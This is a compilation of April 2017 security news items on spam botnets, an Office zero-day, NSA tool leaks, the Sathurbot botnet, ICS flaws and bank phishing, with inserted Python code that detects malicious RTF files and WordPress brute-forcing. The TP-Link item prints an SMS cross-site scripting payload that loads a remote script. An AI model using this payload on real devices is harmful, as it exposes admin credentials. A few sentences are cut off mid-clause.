Pyotr Levashov, who also uses the aliases Peter Severa and Peter of the North, is supposedly connected to the Waledac and Kelihos spam botnets, Brian Krebs reports. As he points out, Levashov is present on Spamhaus’ global Top 10 Worst Spammers.
Capable of sending around 1.5 billion spam messages a day, Waledac was taken down in 2010, but Kelihos emerged the same year, featuring many code similarities with the previous threat. However, the new malware variant wasn’t considered as part of the Waledac family, as it was a new and separate spam botnet.
Kelihos is currently one of the largest spam bots out there, and has been able to withstand several takedown attempts by security companies. Last year, the botnet was observed tripling its size overnight, and is currently placed first in Check Point’s Top 10 malware threats. Earlier this year, it also displayed worm-like distribution capabilities.
According to Krebs, while there is ample evidence tying Levashov to Waledac/Kelihos, the man is also believed to be connected to a series of criminal operations where malware authors and spammers were paid to install “fake antivirus” software that would display an overwhelming amount of alerts to victims, in an attempt to force them into buying bogus software.
Levashov is said to have made more money renting the spam botnets to other cybercriminals than running the email-blasting operations on his own. Reportedly, he would demand $300 per million messages promoting auction and employment scams, and $500 per million phishing emails. Recently, the Kelihos botnet was observed distributing ransomware.
Alleged Russian hacker arrested in Spain reportedly over US Presidential Election Hack
10.4.2017 securityaffairs CyberCrime
Spanish law enforcement arrested in Barcelona the Russian hacker Pyotr Levashov, who is suspected of being involved in attacks on the 2016 US Election.
Spanish law enforcement arrested in Barcelona the Russian hacker and alleged spam kingpin Pyotr Levashov (36). The man is suspected of being involved in hacking attacks against entities linked to the 2016 US Presidential Election.
The Russian embassy in Madrid confirmed the arrest of the suspect but did not disclose the reason for the arrest.
“Russian television station RT reported that Levashov was arrested under a U.S. international arrest warrant and was suspected of being involved in hacking attacks linked to alleged interference in last year’s U.S. election.” reported the Reuters Agency.
“Peter Carr, a spokesman for the U.S. Justice Department’s criminal division, said: ‘The U.S. case remains under seal, so we have no information to provide at this time.’”
A U.S. Department of Justice official told the Reuters that the man was suspected of cyber crime and not of state-sponsored hacking.
Pyotr Levashov was detained by the Spanish police in Barcelona after the US authorities issued an international arrest warrant for the arrest of the Russian hacker.
The arrest of Levashov is the second one made by the Spanish police related to hackers suspected of being involved in the attacks against the US 2016 election. In January, the police
Early this year, the Spanish police arrested the hacker Stanislav Lisov (32) on suspicion of creating and distributing the dreaded NeverQuest Banking Trojan. The authorities believe he was also involved in the attacks against the US Presidential Election.
The Neverquest banking trojan, aka Vawtrak, is very popular in the criminal underground. It has been around for several years and was used to target hundreds of financial institutions worldwide.
One of the latest variants, discovered in summer 2016, was spotted by experts from the firm Fidelis. The new version of the Neverquest malware included significant improvements such as SSL pinning and a DGA mechanism that generates .ru domains with a pseudorandom number generator (PRNG) found in the loader.
The US authorities are going to request the extradition of both hackers arrested in Spain to the United States.
Security experts linked Levashov to Peter Severa (aka Peter Levashov), one of the Top 10 Worst Spammers in the world.
The US government has repeatedly accused the Kremlin of hacking the Democratic Party in order to influence the final result of the election.
Downloaders and Trojans Threaten Czech Users Most Often
10.4.2017 SecurityWorld Viruses
The malicious code Danger is not giving up: it has dominated domestic cyber threats for many months now. When will its reign end?
The onslaught of malicious e-mail attachments spreading the Danger malware is not letting up, according to a survey published by Eset. In March, this internet threat accounted for one in four attacks detected in the Czech Republic.
Compared with February, the share of this malware among all internet threats rose by five percentage points, returning to the levels it showed during last year.
"Danger is a classic downloader that can pull further malware and various kinds of malicious code, including ransomware, onto the infected device. From the user's and prevention point of view, it is important to be cautious and not open every attachment, especially if the sender or the e-mail itself looks suspicious," says Miroslav Dvořák, technical director of Eset.
The fact that Danger has stayed at the top for so long in the Czech Republic shows, according to Dvořák, that it is effective malware with which attackers are still able to find enough victims.
The second most frequently detected malware in March, Nemucod, is also a downloader. Its share almost doubled month on month compared with February, reaching nearly nine percent. A new entry in the top ten internet threats is the Java/QRat Trojan.
"It is a variant of a Remote Access Trojan for Java. Attackers use it as a backdoor for remote access to the system of the infected device, usually to exfiltrate sensitive data," Dvořák explains.
Java/QRat can browse files, capture login credentials, run programs, activate webcams and carry out other activities in the background without the user of the infected device being aware of them.
Top 10 threats in the Czech Republic for March 2017:
1. JS/Danger.ScriptAttachment (25,90 %)
2. JS/TrojanDownloader.Nemucod (8,84 %)
3. Java/GRat (5,48 %)
4. Win32/Adware.ELEX (4,60 %)
5. JS/Chromex.Submeliux (2,39 %)
6. Win32/Deceptor.AdvancedSystemCare (1,72 %)
7. Java/Adwind (1,59 %)
8. Win32/Packed.VMProtect.ABO (1,57 %)
9. Win32/Obfuscated.NIT (1,53 %)
10. Win32/Packed.VMProtect.AAA (1,43 %)
Zdroj: Eset, duben 2017
A malicious virus that exploits Office documents is spreading across the Internet. There is no patch yet
10.4.2017 Živě.cz Viruses
McAfee warns against opening Office documents from unknown sources and, if you must, to do so only in the safe mode offered by newer versions of the office suite.
According to McAfee, a malicious virus for which there is not yet a patch is spreading across the network. The malware is able to exploit a previously undocumented vulnerability and bypass security even on Office 2016 combined with Windows 10. The exploit therefore affects all versions of Office and Windows.
The virus spreads as a Word document attached to an e-mail. In reality, however, it is an RTF file, and hidden inside it is a malicious VBSA script that downloads an HTA web file from the attacker's server; inside that is again RTF and further code that downloads a pile of malware from other servers.
Not opening unsolicited documents from dubious sources should in any case be a basic rule, regardless of whether they contain a virus or are simply ordinary spam.
Wikileaks publishes further CIA leaks. They describe the creation of viruses for Windows
10.4.2017 Živě.cz BigBrother
The Wikileaks organization has released another batch of leaks from the US Central Intelligence Agency. This time the document covers the Grasshopper toolkit, which the CIA allegedly used to build custom malware for Windows operating systems.
Grasshopper thus resembles some well-known Linux packages such as Metasploit. In both cases it is an environment in which you assemble a specific attack from dozens of modules and then deliver it to the victim's target through other tools and vulnerabilities.
According to the published documents, Grasshopper does exactly the same. The CIA, NSA and other agencies, not only in the USA, therefore use essentially the same procedures as any other security hacker and analyst. Like other similar packages, Grasshopper, according to the leaked documentation, runs in Python.
No money: a new type of ransomware wants a high score in a game from you
10.4.2017 Živě.cz Viruses
Ransomware is an unpleasant thing that locks your computer and forces you to pay a certain sum of money, otherwise you lose all your data. Until now this type of malware has always demanded money from people. Rensenware, however, does not demand money; it wants people to achieve a high score in an anime game to unlock the computer.
The strange malware was first reported by Malware Hunter Team on Twitter. According to them, if a computer is infected with rensenware, exactly the same happens as with classic ransomware: it locks up and displays a message about how it can be unlocked.
Instead of paying a sum, the malicious code wants the person to score 0.2 billion points on the LUNATIC difficulty of the game TH12 – Undefined Fantastic Object. That is not exactly easy, because it is one of those crazy Japanese anime shoot-'em-ups.
As is probably clear, rensenware was created more as a joke than as a way to hurt someone. As soon as the media started taking an interest in the malware, its creator came forward. On Twitter he goes by the name Tvple Eraser. "It was a joke, my friends and I laughed about it. I really did spread the code on the Internet. Some people didn't get it, though, and started blaming me. So I apologize... I didn't mean to be mean," the creator wrote.
The apology is also included in the tool with which rensenware can be removed. It manipulates the game's memory so that the person does not have to try to get the score. So in theory, if you want, you can try installing the thing; the author has taken down the original "evil" version anyway, and the new version clearly states that it is a joke.
How to get admin credentials from TP-Link M5350 3G/Wi-Fi modem with a text message
10.4.2017 securityaffairs Hacking
A German security researcher discovered how to retrieve the admin credentials from a TP-Link M5350 3G/Wi-Fi modem with a malicious text message.
Some bugs are very strange and dangerous. This is the case of a flaw affecting TP-Link's M5350 3G/Wi-Fi router that can expose admin credentials to a malicious text message.
The bug was discovered by security researcher Jan Hörsch from the German firm Securai. Basically, it is a cross-site scripting (XSS) vulnerability that could be exploited by an attacker simply by sending an SMS containing the following attack script:
<script src=//n.ms/a.js></script>
“Among other things, he showed that the mobile router from TP-Link M5350 is permanently vulnerable to cross-site scripting, which is triggered by SMS. If an attacker sends an SMS with the appropriate content, the router answers with the login data of the admin – including the password in the plaintext.” reported Heise.de.
Hörsch conducted intensive research on various Internet-of-Things devices, discovering multiple vulnerabilities. He analyzed the firmware running on several smart objects and found multiple easy-to-exploit bugs; the results of the research were presented at the recent Kaspersky Security Analyst Summit.
The flaw in TP-Link's M5350 3G/Wi-Fi modem looks like a feature created by the developers, likely for testing purposes, that unfortunately was not removed in production.
The device's admin credentials can be retrieved by an attacker with a simple text message: the router replies with the admin username, the admin password, its SSID, and its login password.
It is unlikely that the bug has been fixed by TP-Link: looking at the firmware download page for the TP-Link M5350, the most recent version for the flawed device is M5350_V2_140115, released in January 2015.
Hörsch also analyzed a Panasonic BM ET200 retina scanner and a Startech modem, both of which are affected by flaws.
Researchers warn of a Windows Zero-Day Attack observed in the wild
10.4.2017 securityaffairs Vulnerability
Security researchers from McAfee and FireEye are warning of a Windows zero-day attack in the wild that puts Microsoft users at risk of being hacked.
Security researchers from security firms McAfee and FireEye are warning of hackers exploiting an
Just opening an MS Word document could put you at risk: exploitation of the flaw could allow an attacker to silently install malware on a fully patched Windows machine.
The attack vector is a malicious email carrying a weaponized Word document that contains a booby-trapped OLE2link object.
“The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script.” reads the analysis shared by FireEye. “In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.” “The vulnerability is bypassing most mitigations.”
When the user opens the document, the malicious code is executed: it first connects to a remote server to download a malicious HTML Application (HTA) file that masquerades as a document created in Microsoft's RTF (Rich Text Format).
The HTA file is executed automatically, giving the attackers full code execution on the target machine and letting them download additional malicious payloads to fully compromise it.
The Windows zero-day attack relies on .hta content disguised as a normal RTF file to evade security solutions, but researchers at McAfee spotted the malicious Visual Basic scripts in a later part of the file.
The exploit displays a decoy Word document for the victim to see before terminating, to avoid suspicion.
“The successful exploit closes the bait Word document and pops up a fake one to show the victim. In the background, the malware has already been stealthily installed on the victim’s system.” reads a blog post published by McAfee.
“The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office. (Check our Black Hat USA 2015 presentation, in which we examine the attack surface of this feature.)”
This Windows zero-day attack is very insidious: it requires no further interaction from the victim, for example it doesn't need the victim to enable macros.
The Windows zero-day attack works on all Windows OS versions, even against Windows 10.
McAfee reported the Windows zero-day attacks to Microsoft back in January 2017; for this reason, McAfee decided to publicly disclose the vulnerability, and a day later FireEye did the same.
Microsoft will release security updates this Tuesday; let's hope the company also addresses the zero-day exploited in the wild.
Below are the recommendations for mitigating this kind of Windows zero-day attack:
Do not open any Office files obtained from untrusted locations.
According to our tests, this active attack cannot bypass the Office Protected View, so we suggest everyone ensure that Office Protected View is enabled.
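As an added example (not code from McAfee, FireEye or this article), the following Python performs two static checks for the file-level traits described above: an RTF whose embedded OLE object is declared as an auto-updating link, and HTA/VBScript markup inside a file presented as RTF. The control words \objautlink and \objupdate are standard RTF; the OLE2Link class string in the sample is taken from the reports quoted above, the HTA markers are a heuristic, and all sample documents are constructed.

```python
"""Static checks for the document traits described in the zero-day reports above.

Added example, not code from McAfee, FireEye or this article.  Two checks:
  1. an RTF that embeds an OLE object declared as an automatic link (\objautlink)
     that is refreshed on open (\objupdate), i.e. the OLE2link vector;
  2. HTA/VBScript markup inside a file presented as RTF (the "fake RTF" payload).
Sample documents at the bottom are constructed for the demonstration, not real malware.
"""
from __future__ import annotations

import re

RTF_MAGIC = b"{\\rtf"
OBJECT_START_RE = re.compile(rb"\{\\object\b")
OBJCLASS_RE = re.compile(rb"\\\*\\objclass\s+([A-Za-z0-9_.]+)")
# Heuristic markers of an HTML Application; none of them belongs in a genuine RTF body.
HTA_MARKERS = (b"<hta:application", b"<script", b"vbscript", b"<html")


def _group_end(data: bytes, start: int) -> int:
    """Index just past the '}' that closes the RTF group opening at data[start]."""
    depth = 0
    i = start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":            # control word/symbol: skip the escaped byte (\{ and \})
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return i + 1
        i += 1
    return len(data)              # unterminated group: treat the rest of the file as the group


def find_ole_objects(data: bytes) -> list[dict]:
    """One record per {\\object ...} group: declared class and link/update flags."""
    objects = []
    for m in OBJECT_START_RE.finditer(data):
        group = data[m.start():_group_end(data, m.start())]
        cls = OBJCLASS_RE.search(group)
        objects.append({
            "objclass": cls.group(1).decode("ascii", "replace") if cls else None,
            "autolink": b"\\objautlink" in group,
            "autoupdate": b"\\objupdate" in group,
        })
    return objects


def classify(data: bytes, claimed_extension: str = "rtf") -> list[str]:
    """Return human-readable findings for a document blob (empty list means nothing flagged)."""
    findings = []
    is_rtf = data.lstrip().startswith(RTF_MAGIC)
    if is_rtf:
        for obj in find_ole_objects(data):
            if obj["autoupdate"] or obj["autolink"]:
                findings.append(
                    f"RTF embeds an auto-updating OLE link object (class {obj['objclass']}); "
                    "Word refreshes the link, i.e. fetches the remote content, when the file is opened")
    lowered = data.lower()
    if (is_rtf or claimed_extension.lower() == "rtf") and any(m in lowered for m in HTA_MARKERS):
        findings.append("HTA/VBScript markup inside a file presented as RTF")
    return findings


# Constructed samples (not real malware).
BENIGN_RTF = b"{\\rtf1\\ansi Quarterly report: {\\b totals} attached below.}"
LINKED_RTF = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass OLE2Link}"
    b"{\\*\\objdata 0105000002000000}}}"
)
FAKE_RTF_HTA = (
    b"{\\rtf1\\ansi}\r\n<html><head><hta:application id=\"x\"/>"
    b"<script language=\"VBScript\">' constructed placeholder, no payload</script>"
    b"</head></html>"
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_RTF), ("linked", LINKED_RTF), ("fake-rtf", FAKE_RTF_HTA)):
        print(name, classify(blob) or ["nothing flagged"])
```

The second check is a heuristic: a genuine RTF quoting HTML in its text would also trip it, so treat a hit as a reason to open the file only in Protected View or a sandbox, not as proof by itself.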
Shadow Brokers Release More NSA Exploits
10.4.2017 securityweek BigBrothers
The hacker group calling itself “Shadow Brokers” has released another round of exploits and tools allegedly used by the NSA-linked threat actor “Equation Group,” along with a message to U.S. President Donald Trump.
Over the weekend, the group published the password to a previously released password-protected archive. An analysis of the files revealed the existence of various exploits and lists of organizations apparently targeted by the Equation Group.
Google Project Zero researcher Tavis Ormandy said one of the leaked exploits, dubbed EXACTCHANGE, relies on a Linux kernel vulnerability that can be exploited for local privilege escalation. Ormandy believes the Equation Group had the exploit “for years” before it was discovered by Google researchers in 2009.
An analysis conducted by Maksym Zaitsev showed that the leaked files include what appear to be Solaris exploits, a cross-platform RAT, Linux keyloggers, exploits targeting Cisco firewalls, system fingerprinting tools, an IP.Board exploit, and Apache and Samba zero-days affecting several Linux distributions.
A researcher who uses the online moniker “x0rz” also analyzed the latest dump and identified a tool that can clean logs (TOAST), a fake Chinese browser (ELECTRICSLIDE), and several GSM-related tools (CURSEHAPPY, EDITIONHAZE, LIQUIDSTEEL, SHAKENGIRAFFE, WHOLEBLUE). He also found evidence that the Equation Group had been looking for clues of attacks by other threat actors on compromised systems.
Experts also found lists of IP addresses and domain names that may belong to organizations targeted by the Equation Group, and they pointed out that victims include U.S. allies.
The Shadow Brokers had initially attempted to sell the exploits they obtained, but none of their strategies, including auctions and direct sale offers, was successful. While the group has now made available another batch of files for free, Zaitsev and others, including Edward Snowden, believe there are still some files that have not been released.
Edward Snowden (@Snowden), 8 Apr 2017: “Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so... (1/2)” “...much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal.”
In a message they posted on Medium, the Shadow Brokers told President Trump that they are disappointed by his actions.
“TheShadowBrokers voted for you,” the hackers said. “TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning ‘your base’, ‘the movement’, and the peoples who getting you elected.”
The group has once again claimed that it is not connected to Russia, but they did say that Russia and Putin are the United States’ “best allies until the common enemies are defeated and America is great again.”
However, some people have pointed out that the timing of the leak is suspicious – it comes shortly after the U.S. decided to bomb Syria, which is an ally of Russia. Some experts had previously suggested that the Shadow Brokers is actually an English-speaking group.
While many of the exploits leaked previously by Shadow Brokers turned out to rely on old vulnerabilities, some companies, including Cisco, did identify some zero-days. It remains to be seen if tech companies confirm any unpatched flaws in the latest leaks.
Sathurbot Botnet Targets WordPress Accounts
10.4.2017 securityweek BotNet
A recently observed backdoor Trojan is ensnaring victims’ computers into a botnet that attempts to brute-force its way into WordPress accounts. The compromised WordPress sites are then used to spread the malware further.
Dubbed Sathurbot, the backdoor Trojan uses torrents as a delivery medium. Compromised websites are used to host fake movie and software torrents and, when a user searches the web for a movie or software to download, links to these websites are served instead of legitimate torrents.
Users accessing movie subpages are served with the same torrent file, while those going for software are served a different torrent file. Because the torrents are well-seeded, they might appear legitimate. Both the movie and the software torrent contain an executable and are meant to entice the victim into running it, thus loading the Sathurbot DLL.
Once launched, the malware informs the victim that their machine has become a bot in the Sathurbot network. Sathurbot also retrieves its command and control (C&C) at startup. Communication with the server involves status reporting, task retrieval, and the receiving of links to other malware downloads.
“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list,” ESET security researchers warn.
The malware reports its successful installation and a listening port to the server, and also reports back periodically, while waiting for additional tasks.
Sathurbot comes with some 5,000 plus basic generic words that are randomly combined to form 2-4 word phrases used as query strings via popular search engines. It then selects a random 2-4 word long text chunk from the webpage of each URL in the search results, and uses it for the next round of search queries. The second set of search results is used to harvest domain names.
The threat selects only the domains that are created using WordPress, but it appears that the threat is also interested in the Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks. The malware sends the harvested domains to the C&C.
The bot then receives a list of domain access credentials (formatted as login:password@domain) that it then probes for access, and ESET says that different bots try different login credentials for the same site. Further, to avoid being blocked, each bot only tries a single login per site and moves to the next domain.
“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET reveals. They also note that the XML-RPC API (particularly, the wp.getUsersBlogs API) of WordPress is used in the attack.
The bot also has the libtorrent library integrated, and is designed to become a seeder by downloading a binary file and creating the torrent. However, it appears that not all bots in the network perform all of these functions, as some are only used as web crawlers, others only attack the XML-RPC API, while others do both. Not all bots become seeders either.
“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs,” the security researchers explain.
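The two log indicators ESET describes above, many distinct sources each posting to /wp-login.php exactly once and wp.getUsersBlogs calls via XML-RPC, can be checked with the added Python below (not ESET's code). It assumes an access log in the Apache/nginx combined format, that the XML-RPC POST body is available (for example from a WAF or a logging plugin, since the access log records only the path), and threshold values chosen here for illustration; the log lines and request bodies are constructed.

```python
"""Spotting the Sathurbot login pattern in WordPress-facing logs.

Added example, not ESET's code.  Assumes Apache/nginx "combined" log lines and,
for the XML-RPC check, that the POST body has been captured (e.g. by a WAF or a
logging plugin), since the access log records only the path /xmlrpc.php and not
the method called.  Log lines and request bodies below are constructed.
"""
from __future__ import annotations

import re
from collections import Counter

COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
METHOD_NAME_RE = re.compile(r"<methodName>\s*([\w.]+)\s*</methodName>")


def parse_line(line: str) -> dict | None:
    """Fields of one combined-format access log line, or None if it does not parse."""
    m = COMBINED_LOG_RE.match(line)
    return m.groupdict() if m else None


def wp_login_attempts_by_source(lines) -> dict[str, int]:
    """Count POST requests to /wp-login.php per source IP (query string ignored)."""
    counts: Counter[str] = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?", 1)[0] == "/wp-login.php":
            counts[rec["ip"]] += 1
    return dict(counts)


def looks_like_sathurbot(lines, min_sources: int = 5, single_try_ratio: float = 0.8):
    """Flag the signature ESET describes: many distinct sources, each trying one login.

    Thresholds are illustrative assumptions.  Returns (flagged, distinct_sources,
    single_try_sources) so the caller can tune them against its own traffic.
    """
    counts = wp_login_attempts_by_source(lines)
    total = len(counts)
    singles = sum(1 for n in counts.values() if n == 1)
    flagged = total >= min_sources and total > 0 and singles / total >= single_try_ratio
    return flagged, total, singles


def xmlrpc_methods(body: str) -> list[str]:
    """All <methodName> values in an XML-RPC request body (also catches nested calls)."""
    return METHOD_NAME_RE.findall(body)


def is_wp_credential_probe(body: str) -> bool:
    """wp.getUsersBlogs takes a username and password, which is why the bot calls it."""
    return "wp.getUsersBlogs" in xmlrpc_methods(body)


# Constructed log: five sources with a single POST each (203.0.113.x), one
# ordinary visitor, and one user who retried a password (192.0.2.44).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Apr/2017:09:12:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Apr/2017:09:12:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2017:09:12:04 +0000] "GET /about/ HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Apr/2017:09:12:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.13 - - [10/Apr/2017:09:12:09 +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.14 - - [10/Apr/2017:09:12:11 +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Apr/2017:09:13:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Apr/2017:09:13:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
""".splitlines()

# Constructed XML-RPC bodies: a credential probe and a harmless pingback.
PROBE_BODY = ('<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName>'
              '<params><param><value>admin</value></param>'
              '<param><value>placeholder-password</value></param></params></methodCall>')
PINGBACK_BODY = ('<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName>'
                 '<params><param><value>http://example.com/a</value></param></params></methodCall>')

if __name__ == "__main__":
    print("wp-login pattern:", looks_like_sathurbot(SAMPLE_LOG))
    print("probe body:", is_wp_credential_probe(PROBE_BODY), "pingback:", is_wp_credential_probe(PINGBACK_BODY))
```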
Consisting of over 20,000 infected computers, Sathurbot is believed to have been active since at least June 2016.
Flaw in Popular Framework Exposes Many ICS Devices to Attacks
10.4.2017 securityweek ICS
Hundreds of thousands of Industrial Internet of Things (IIoT) and industrial control systems (ICS) products could be exposed to hacker attacks due to critical vulnerabilities affecting a widely used piece of software from Germany-based 3S-Smart Software Solutions.
The flaws affect the CODESYS automation software for developing and engineering controller applications, specifically the Web Server component of the CODESYS WebVisu visualization software. The issues have been fixed by 3S-Smart Software Solutions, but experts believe it will take some time until the patch reaches all vulnerable devices.
The security holes, discovered by researchers at industrial cybersecurity startup CyberX, affect CODESYS Web Server 2.3 and prior, and they have been addressed with patch version 1.1.9.18. ICS-CERT has published an advisory describing the flaws.
One of the vulnerabilities, tracked as CVE-2017-6027, allows an attacker to upload arbitrary files to the CODESYS Web Server by sending a specially crafted request. Exploitation of the flaw can lead to arbitrary code execution.
The second vulnerability, identified as CVE-2017-6025, is a stack-based buffer overflow that exists because the size of strings sent to the functions that handle the XML is not properly checked before they are copied to memory. An attacker can exploit this weakness to crash the application or execute arbitrary code.
According to CyberX, there are several possible exploitation scenarios. For example, an attacker can use a search engine such as Shodan to identify vulnerable devices that are directly connected to the Internet, and then remotely exploit the vulnerabilities.
Another scenario described by the security firm involves a malicious actor delivering a piece of malware that exploits the vulnerabilities via a USB drive. A remote attacker can also compromise the targeted organization’s IT network and from there move onto the OT network, where they would have access to vulnerable devices.
“Attackers could exploit the vulnerabilities to install back-doors in order to perform industrial cyberespionage, deploy ransomware, and execute cyber-sabotage operations to disrupt production or cause catastrophic safety failures and environmental damage,” researchers warned in a blog post.
CODESYS software is used in hundreds of PLCs and other products from companies worldwide. According to the vendor, more than a million devices that use CODESYS software are sold every year and, as of mid-2016, over half of the products listed in the company’s device directory had been using the vulnerable component.
CyberX said CODESYS was quick to develop a patch, which the security firm has tested and validated. However, vulnerabilities in third-party components can be problematic as it can take a lot of time until patches reach end-users.
“Each device manufacturer must first apply the CODESYS patch to their own code, then recompile the firmware, and then send a firmware update to their end-users. The CODESYS patch can’t be installed by end-user organizations,” CyberX explained. “Most devices require firmware to be ‘reflashed,’ which is a lengthier and more complicated process than standard software updates on your phone or PC.”
This is not the first time a vulnerability affecting a third-party component has exposed devices from numerous vendors. Back in 2015, researchers disclosed a serious flaw in a CodeWrights library used by many manufacturing and technology companies for HART-based field devices.
The Lazarus group's financial attacks cost 81 million dollars
9.4.2017 SecurityWorld Crime
After more than a year of investigation, Kaspersky Lab has published the results of its inquiry into the activities of the Lazarus group, the notorious hacking group that was probably behind the theft of 81 million dollars from the Central Bank of Bangladesh in 2016.
Thanks to forensic analysis of the traces the group left in banks in Southeast Asia and Europe, Kaspersky Lab gained a comprehensive picture of the malicious tools the group uses. The company also uncovered the procedures the group chooses for attacks on financial institutions, casinos, software developers for investment companies and cryptocurrency businesses around the world. This knowledge helped detect and thwart at least two further attacks that aimed to steal large sums of money from financial institutions.
In February of last year, a (then unknown) group of hackers attempted to steal 851 million dollars from the Central Bank of Bangladesh and succeeded in transferring 81 million dollars. This act represents one of the largest and most successful cyber thefts to date.
The subsequent investigation, in which experts from many IT security companies including Kaspersky Lab took part, revealed that the most likely perpetrator could be the Lazarus group. This notorious cyber-espionage and sabotage group is responsible for a series of regular destructive attacks. Since 2009 it has been behind attacks on manufacturing companies, media and financial institutions in at least 18 countries around the world.
Although the group went quiet for several months after the Bangladesh attack, it did not remain idle. It was preparing for another operation, again aimed at financial theft from banks. By that time the cybercriminals had already established contacts in one of the financial institutions in Southeast Asia. Their plans, however, were thwarted by the subsequent investigation.
For the next several months they therefore withdrew again and decided to change tactics, moving their operations to Europe. But here too their attempts were interrupted by Kaspersky Lab's detection security software and thanks to the rapid response, forensic analysis and reverse engineering carried out by the company's top experts.
Based on the results of the forensic analysis of these attacks, Kaspersky Lab experts were able to reconstruct the Lazarus group's modus operandi.
Initial infection: The breach happens through a single system inside the bank, either via vulnerable remotely accessible code (e.g. on a web server) or via a "watering hole attack" enabled by an exploit planted on otherwise harmless websites. As soon as a bank employee visits such a site, malware takes over the computer and downloads further components.
Establishing a foothold: The cybercriminals then spread to other banking systems and deploy persistent backdoors; the malware lets them come and go whenever they want.
Internal reconnaissance: Over the following days and weeks the group learns the network environment and identifies valuable resources. Such a resource may be a backup server where authentication information is stored, a mail server, or an entire domain controller with access to every part of the company. Last but not least, servers that store and process records of financial transactions can be a valuable resource.
Attack and theft: Finally they deploy special malware capable of bypassing the security mechanisms of the internal financial software and carry out fraudulent transactions in the bank's name.
Attackers and their victims
Kaspersky Lab experts spent weeks of work investigating this case. The cybercriminals, however, could have operated unnoticed for many months. For example, while investigating the incident in Southeast Asia, the experts found that the hackers may have penetrated the bank's network as early as 7 months before the moment the bank's security team asked for help in resolving the case. In fact, the group had access to the bank's network even before the Bangladesh incident.
Based on Kaspersky Lab data from December 2015, pieces of malware related to the Lazarus group appeared in financial institutions and casinos, at software developers for investment companies and at cryptocurrency businesses in Korea, Bangladesh, India, Vietnam, Indonesia, Costa Rica, Malaysia, Poland, Iraq, Ethiopia, Kenya, Nigeria, Uruguay, Gabon, Thailand and several other countries. The latest recorded activity was detected by Kaspersky Lab in March of this year, which indicates that the attackers have no plans to stop.
Although the attackers took great care not to leave any trace, on one server they compromised as part of another campaign they made a serious mistake. During preparation for the operation, the server was configured as the malware's command and control center. On the day of configuration the first connections came from several VPN/proxy servers, indicating a testing phase for the C&C server. At the same time, however, there was also one brief connection that came from a very rare IP address originating in North Korea.
According to the experts, there may be several explanations:
The attackers connected from the given IP address in North Korea.
It was a carefully planned false-flag operation by someone else.
Someone from North Korea accidentally visited the command and control URL.
The Lazarus group is investing massively in new variants of its malware. For several months its members tried to create a malicious toolkit that would be undetectable by security solutions. Every time they tried, however, they were exposed by Kaspersky Lab specialists, who identified unique characteristic features of their code and could then use them to track new cases. At present the cybercriminals have gone quiet again, which probably means they are working on improving their arsenal.
Fraudsters have a new trick. They say nothing and wait for their victim
9.4.2017 Novinky/Bezpečnost Phishing
In recent days, computer pirates posing as employees of Česká spořitelna have come up with a new trick. They try to fool the victim by saying nothing at all in the fraudulent e-mail. Representatives of the bank themselves warned of the new threat.
"We draw attention to a new form of fraudulent e-mail that we have observed in recent days. The message gives the impression that it was sent from Česká spořitelna," the bank's representatives said.
At first glance the fraudulent e-mail really does look as if it was sent from the csas.cz address, which the bank actually uses. The fraudsters simply spoof the domain in question, and less attentive users can easily be fooled.
Beware of the attachment
Compared with previous fraudulent messages, this spam is interesting mainly in that the attackers say nothing at all. The text contains only the message "Attached FYI" and the signature of a supposed bank employee. FYI is an abbreviation of the English "For Your Information".
Less vigilant individuals can thus easily be misled and click on the attachment out of curiosity. "Its sole purpose is to infect the client's computer with malware. We therefore strongly warn against any response to e-mails with suspicious content," the bank's representatives warned.
The cyber fraudsters thus, without exaggeration, say nothing at all and, like anglers, wait for their victim to take the bait.
Contact the bank immediately
"Pay increased attention to the e-mail messages you receive, especially the attachments and active links these messages contain. If in any doubt, contact us on the toll-free number 800 207 207. If you uncover any fraudulent e-mail, please send it to us at phishing@csas.cz," the bank's recommendation reads.
